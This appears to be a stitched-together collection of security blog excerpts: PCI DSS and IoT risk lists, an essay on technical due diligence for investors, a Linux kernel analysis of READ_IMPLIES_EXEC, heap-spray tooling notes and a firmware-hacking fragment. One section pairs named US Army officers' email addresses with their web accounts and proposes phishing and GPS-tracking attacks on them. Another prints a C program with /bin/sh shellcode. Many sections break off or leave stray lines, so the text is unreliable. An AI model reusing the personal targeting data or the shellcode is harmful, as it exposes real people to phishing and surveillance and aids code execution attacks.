PCI DSS and Security Breaches

2. Requirements designed to detect malicious activities.

These requirements involve implementing solutions such as antivirus software, intrusion detection systems, and file integrity monitoring.

3. Requirements designed to ensure that, if a security breach occurs, actions are taken to respond to and contain it, and that evidence will exist to identify and prosecute the attackers.

INTERNET-of-THREATS

- Laptops, tablets, smartphones, set-top boxes, media-streaming devices, and data-storage devices

- Watches, glasses, and clothes

- Home appliances, home switches, home alarm systems, home cameras, and light bulbs

- Industrial devices and industrial control systems

- Cars, buses, trains, planes, and ships

- Medical devices and health systems

- Traffic sensors, seismic sensors, pollution sensors, and weather sensors

- Sensitive data sent over insecure channels

- Improper use of encryption

- No SSL certificate validation

- Things like encryption keys and signing certificates easily available to anyone

- Hardcoded credentials/backdoor accounts

- Lack of authentication and/or authorization

- Storage of sensitive data in clear text

- Unauthenticated and/or unauthorized firmware updates

- Lack of firmware integrity check during updates

- Use of insecure custom-made protocols

- Training developers on secure development

- Implementing security development practices to improve software security

- Training company staff on security best practices

- Implementing a security patch development and distribution process

- Performing product design/architecture security reviews

- Performing source code security audits

- Performing product penetration tests

- Performing company network penetration tests

- Staying up-to-date with new security threats

- Creating a bug bounty program to reward reported vulnerabilities and clearly defining how vulnerabilities should be reported

- Implementing a security incident/emergency response team

The password is irrelevant too

An Equity Investor’s Due Diligence

Information technology companies constitute the core of many investment portfolios nowadays. With so many new startups popping up, and some highly visible IPOs and acquisitions by public companies egging things on, many investors are clamoring for a piece of the action and looking for new ways to rapidly qualify or disqualify an investment, particularly when it comes to the hottest of hot investment areas: information security companies.

Over the years I’ve found myself working with a number of private equity investment firms, helping them review the technical merits and implications of products being brought to market by new security startups. In most cases it’s not until the B or C investment rounds that the money being sought by the fledgling company becomes serious for the investors I know. If you’re going to be handing over money in the five to twenty million dollar range, you’re going to want to do your homework on both the company and the product opportunity.

Over the last few years I’ve noted that a sizable number of private equity investment firms have built into their portfolio reviews the kind of technical due diligence traditionally associated with the formal acquisition processes of Fortune 500 technology companies. It seems to me that the $20,000 to $50,000 price tag for a quick-turnaround technical due diligence report is proving to be a valuable investment within a somewhat larger investment strategy.

When it comes to performing technical due diligence on a startup (whether it’s a security or a social media company, for example), the process tends to require a mix of technical review and past experience if it’s to be useful, let alone actionable, to the potential investor. Here are some of the due diligence phases I recommend, and why:

- Vocabulary Distillation – For some peculiar reason, new companies go out of their way to invent their own vocabulary to describe their value proposition, or go to great lengths to disguise the underlying processes of their technology with what can best be described as word-soup. For example, a “next-generation big-data derived heuristic determination engine” can more than adequately be summed up as “signature-based detection”. Apparently, using the word “signature” in your technology description is frowned upon, and product management folks avoid the word (however applicable it may be). Distilling the word soup is a key part of being able to compare apples with apples.

- Overlapping Technology Review – Everyone wants to portray their technology as unique, ground-breaking, or next generation. Unfortunately, in the world of security, next year’s technology is almost certainly a progression of the last decade’s worth of invention. This isn’t necessarily bad, but it is important to determine the DNA and hereditary path of the “new” technology (and of the subcomponents of the product the start-up is bringing to market). Being able to filter through the word-soup of the first phase and determine whether the start-up’s approach duplicates functionality from IDS, AV, DLP, NAC, etc. is critical. I’ve found that many start-ups position their technology (i.e. their advancements) against antiquated and idealized versions of these prior technologies: for example, reducing desktop antivirus products to signature engines while neglecting heuristic engines, local-host virtualized sandboxes, and dynamic cloud analysis.

- Code Language Review – It’s important to look at the languages the company has used to develop its product. Popular rapid-prototyping technologies like Ruby on Rails or Python are likely acceptable for back-end systems (as employed within a private cloud), but are potential deal killers for future acquirers that will want to integrate the technology with their own existing product portfolio (i.e. they’re not going to want to rewrite the product). Similarly, a C or C++ implementation may not offer the flexibility needed for rapid evolution or integration into scalable public cloud platforms. Knowing which development technology has been used where, and for what purpose, can rapidly qualify or disqualify the strength of the company’s product management and engineering teams, and help orient an investor on future acquisition or IPO paths.

- Security Code Review – Depending upon the size of the application and the due diligence period allowed, a partial code review can yield insight into a number of increasingly critical areas. These include the stability and scalability of the code base (and consequently the maturity of the development processes and engineering team), the number and nature of vulnerabilities (i.e. security flaws that could derail the company publicly), and the effort required to integrate the product or proprietary technology with existing major platforms.

- Does it do what it says on the tin? – I hate to say it, but there’s a lot of snake oil being peddled nowadays, especially for new enterprise protection technologies. In a nutshell, this phase focuses on the claims made in the marketing literature and by the product management teams, and tests both the viability and the technical merits of each of them. Test harnesses are usually created to monitor how well the technology performs in the face of real threats. These range from the samples provided by the company’s user acceptance testing (UAT) team (i.e. the stuff they guarantee they can handle), through common hacking tools and tactics, and on to a skilled adversary with key domain knowledge.

- Product Penetration Test – Conducting a detailed penetration test against the start-up’s technology, product, or service delivery platform is always strongly recommended. These tests tend to reveal important information about the lifecycle maturity of the product and its potential exposure to negative media attention due to exploitable flaws. This is particularly important for consumer-focused products and services, because their flaws are the most likely to be uncovered and exposed by external security researchers and hackers. Any public exploitation can easily set the start-up back a year or more in brand equity alone. For enterprise products (e.g. appliances and cloud services) the hacker threat is different; the focus should be more on what vulnerabilities could be introduced into the customer’s environment and how much effort would be required to re-engineer the product to meet security standards.

Obviously there’s a lot of variety in the technical capabilities of the various private equity investment firms (and private investors). Some have people capable of sifting through the marketing hype and discerning the actual intellectual property powering the start-up’s technology, but many do not. Regardless, in working with these investment firms and performing technical due diligence on their potential investments, I’ve yet to encounter a situation where they didn’t “win” in some way. One particular favorite of mine involved a code review and penetration test that uncovered numerous serious vulnerabilities. The private equity firm was still intent on investing in the start-up, but was able to use the report to negotiate much better buy-in terms with the existing investors, gaining a larger percentage of the start-up for the same amount.

The password is irrelevant

Practical and cheap cyberwar (cyber-warfare): Part II

| Site | Accounts | % |
|---|---|---|
| Facebook | 308 | 17.26457 |
| Google | 229 | 12.83632 |
| Orbitz | 182 | 10.20179 |
| WashingtonPost | 149 | 8.352018 |
| Twitter | 108 | 6.053812 |
| Plaxo | 93 | 5.213004 |
| LinkedIn | 65 | 3.643498 |
| Garmin | 45 | 2.522422 |
| MySpace | 44 | 2.466368 |
| Dropbox | 44 | 2.466368 |
| NYTimes | 36 | 2.017937 |
| NikePlus | 23 | 1.289238 |
| Skype | 16 | 0.896861 |
| Hulu | 13 | 0.7287 |
| Economist | 11 | 0.616592 |
| Sony Entertainment Network | 9 | 0.504484 |
| Ask | 3 | 0.168161 |
| Gartner | 3 | 0.168161 |
| Travelers | 2 | 0.112108 |
| Naymz | 2 | 0.112108 |
| Posterous | 1 | 0.056054 |

| Name | Email | Accounts found |
|---|---|---|
| Robert Abrams | robert.abrams@us.army.mil | orbitz.com, washingtonpost.com |
| James Boozer | james.boozer@us.army.mil | orbitz.com, facebook.com |
| Vincent Brooks | vincent.brooks@us.army.mil | facebook.com, linkedin.com |
| James Eggleton | james.eggleton@us.army.mil | plaxo.com |
| Reuben Jones | reuben.jones@us.army.mil | plaxo.com, washingtonpost.com |
| David Quantock | david-quantock@us.army.mil | twitter.com, orbitz.com, plaxo.com |
| Dave Halverson | dave.halverson@conus.army.mil | linkedin.com |
| Jo Bourque | jo.bourque@us.army.mil | washingtonpost.com |
| Kev Leonard | kev-leonard@us.army.mil | facebook.com |
| James Rogers | james.rogers@us.army.mil | plaxo.com |
| William Crosby | william.crosby@us.army.mil | linkedin.com |
| Anthony Cucolo | anthony.cucolo@us.army.mil | twitter.com, orbitz.com, skype.com, plaxo.com, washingtonpost.com, linkedin.com |
| Genaro Dellarocco | genaro.dellarocco@msl.army.mil | linkedin.com |
| Stephen Lanza | stephen.lanza@us.army.mil | skype.com, plaxo.com, nytimes.com |
| Kurt Stein | kurt-stein@us.army.mil | orbitz.com, skype.com |

- Many have Facebook accounts that publicly expose family and friend relationships, which attackers could target.

- Most of them read, and are probably subscribed to, The Washington Post (makes sense, no?). This could be an interesting avenue for attacks such as phishing and watering-hole attacks.

- Many of them use orbitz.com, probably for car rentals. Hacking this site could give attackers a lot of information about how they move, when they travel, etc.

- Many of them have accounts on google.com, probably meaning they have Android devices (smartphones, tablets, etc.). This could allow attackers to compromise the devices remotely (by email, for instance) with known or 0-day exploits, since these devices are not usually patched and are not very secure.

- And last but not least, many of them, including generals, use garmin.com or nikeplus.com. These websites are related to GPS devices, including running watches, and allow users to upload GPS data, which makes them very valuable to attackers for tracking purposes: attackers could learn in what area a person usually runs, travels, etc.



A Short Tale About executable_stack in elf_read_implies_exec() in the Linux Kernel

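```c
#include <unistd.h>

/* x86-64 Linux execve("/bin/sh", NULL, NULL) shellcode, stored as an
   initialized global, so it ends up in .data rather than on the stack. */
char shellcode[] =
    "\x48\x31\xd2\x48\x31\xf6\x48\xbf"
    "\x2f\x62\x69\x6e\x2f\x73\x68\x11"
    "\x48\xc1\xe7\x08\x48\xc1\xef\x08"
    "\x57\x48\x89\xe7\x48\xb8\x3b\x11"
    "\x11\x11\x11\x11\x11\x11\x48\xc1"
    "\xe0\x38\x48\xc1\xe8\x38\x0f\x05";

int main(int argc, char **argv) {
    void (*fp)(void);

    /* Treat the data bytes as a function and jump to them; this only
       works if the page holding 'shellcode' is executable. */
    fp = (void (*)(void))shellcode;
    (*fp)();

    return 0;
}
```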







I immediately thought this was wrong. The code to be executed would be placed in the ‘shellcode’ symbol in the .data section of the ELF file, which in turn would be in the data memory segment at runtime, not in the stack segment. For some reason, though, executing it without enabling the executable-stack bit failed, while enabling the bit made it work:

According to the execstack man page:

The first loadable segment in both binaries, with the ‘E’ flag enabled, is where the code itself resides (the .text section) and the second one is where all our data resides. It’s also possible to map which bytes from each section correspond to which memory segments (remember, at runtime, the sections are not taken into account, only the program headers) using ‘readelf -l shellcode’.



So far, everything makes sense to me. But wait a minute: the shellcode, like any other variable declared outside main(), is not supposed to be on the stack, right? Instead, it should be placed in the section where initialized data resides (as far as I know, normally .data or .rodata). Let’s see exactly where it is by showing the symbol table and the section of each symbol (where applicable):

It’s pretty clear that our shellcode will be located at memory address 0x00600840 at runtime and that its bytes reside in the .data section. The other binary, ‘shellcode_execstack’, gives the same result.



By default, the data memory segment doesn’t have the PF_EXEC flag enabled in its program header. That is why it’s not possible to jump to and execute code in that segment at runtime (segmentation fault). So why, when the stack is executable, is it also possible to execute code in the data segment even though that flag is not enabled?

Is this normal behavior, or is it a bug in the dynamic linker or the kernel that ignores that flag when loading ELF files? To take the dynamic linker out of the game, my colleague Ilja van Sprundel suggested compiling with -static to create a standalone executable. A static binary doesn’t go through the dynamic linker; instead, it’s loaded directly by the kernel (as far as I know). The static binary behaved the same way, which pointed directly at the kernel.

Now for the interesting part: what is really happening on the kernel side? I went straight to load_elf_binary() in linux-2.6.32.61/fs/binfmt_elf.c and found that the program header table is parsed to find the stack segment, so that the executable_stack variable can be set accordingly:

```c
int executable_stack = EXSTACK_DEFAULT;
…
elf_ppnt = elf_phdata;
for (i = 0; i < loc->elf_ex.e_phnum; i++, elf_ppnt++)
    if (elf_ppnt->p_type == PT_GNU_STACK) {
        if (elf_ppnt->p_flags & PF_X)
            executable_stack = EXSTACK_ENABLE_X;
        else
            executable_stack = EXSTACK_DISABLE_X;
        break;
    }
```

Keep in mind that the kernel defines only these three executable-stack constants (linux-2.6.32.61/include/linux/binfmts.h):

```c
/* Stack area protections */
#define EXSTACK_DEFAULT   0 /* Whatever the arch defaults to */
#define EXSTACK_DISABLE_X 1 /* Disable executable stacks */
#define EXSTACK_ENABLE_X  2 /* Enable executable stacks */
```

Later on, the process’ personality is updated as follows:

```c
/* Do this immediately, since STACK_TOP as used in setup_arg_pages
   may depend on the personality. */
SET_PERSONALITY(loc->elf_ex);
if (elf_read_implies_exec(loc->elf_ex, executable_stack))
    current->personality |= READ_IMPLIES_EXEC;

if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
    current->flags |= PF_RANDOMIZE;
…
```

elf_read_implies_exec() is a macro in linux-2.6.32.61/arch/x86/include/asm/elf.h:

```c
/*
 * An executable for which elf_read_implies_exec() returns TRUE
 * will have the READ_IMPLIES_EXEC personality flag set automatically.
 */
#define elf_read_implies_exec(ex, executable_stack) \
    (executable_stack != EXSTACK_DISABLE_X)
```

In our case, the ELF binary has the PF_EXEC flag enabled in its PT_GNU_STACK program header, so that macro returns TRUE because EXSTACK_ENABLE_X != EXSTACK_DISABLE_X. As a result, our process’ personality gets the READ_IMPLIES_EXEC flag. This constant, READ_IMPLIES_EXEC, is checked in several memory-related files such as mmap.c, mprotect.c and nommu.c (all in linux-2.6.32.61/mm/). For instance, when do_mmap_pgoff() in mmap.c creates the VMAs (Virtual Memory Areas), it checks the personality so that it can add PROT_EXEC (execution allowed) to the memory segments [1]:

```c
/*
 * Does the application expect PROT_READ to imply PROT_EXEC?
 *
 * (the exception is when the underlying filesystem is noexec
 *  mounted, in which case we dont add PROT_EXEC.)
 */
if ((prot & PROT_READ) && (current->personality & READ_IMPLIES_EXEC))
    if (!(file && (file->f_path.mnt->mnt_flags & MNT_NOEXEC)))
        prot |= PROT_EXEC;
```

And basically, that’s why code in the data segment can be executed when the stack is executable.

Then I had another idea: delete the PT_GNU_STACK program header by changing its program header type to some other random value. That way, executable_stack would remain EXSTACK_DEFAULT when compared in elf_read_implies_exec(), which would return TRUE, right? Let’s see:

The program header type was modified from 0x6474e551 (PT_GNU_STACK) to 0xfee1dead, and note that the second LOAD (data segment, where our code to be executed is) doesn’t have the ‘E’xecutable flag enabled:

```c
#define elf_read_implies_exec(ex, executable_stack) \
    (executable_stack == EXSTACK_ENABLE_X)
```

Perhaps that’s normal Linux kernel behavior, kept for compatibility or some other reason. But isn’t it odd that making the stack executable, or deleting the PT_GNU_STACK header, causes all the memory segments to be loaded with execute permission even when their PF_EXEC flag is not set?

```c
#define elf_read_implies_exec(ex, executable_stack) (executable_stack != EXSTACK_DISABLE_X)

#define INTERPRETER_NONE 0
#define INTERPRETER_ELF 2
```

heapLib 2.0

- heapLib2.js => The JavaScript library that needs to be imported to use heapLib2

- heapLib2_test.html => Example usage of some of the functionality that is available in heapLib2

- html_spray.py => A Python script to generate static HTML pages that could potentially be used to heap spray (i.e. heap spray w/o JavaScript)

- html_spray.html => An example of a file created with html_spray.py

- get_elements.py => An IDAPython script that retrieves information about each DOM element with regard to memory allocation in Internet Explorer. Use this script when reversing mshtml.dll. Yes, this is really bad. I’m no good at IDAPython. Make sure to check the ‘start_addr’ and ‘end_addr’ variables in the .py file. If you are having trouble finding the right address, do a text search in IDA for “<APPLET>” and follow the cross reference. You should see similar data structure listings for HTML tags. The ‘start_addr’ should be the address above the reference to the string “A” (anchor tag).

- demangler.py => Certainly the worst C++ name demangler you’ll ever see.





















Hacking a counterfeit money detector for fun and non-profit

















Recently I took a look at one of these devices, Secureuro. I chose this device because it is widely used in Spain, and its firmware is freely available to download.

- RESET == Main Entry Point

- TIMERs

- UARTs

- SPI

- LPM (Load Program Memory)

- SPM (Store Program Memory)

- IN

- OUT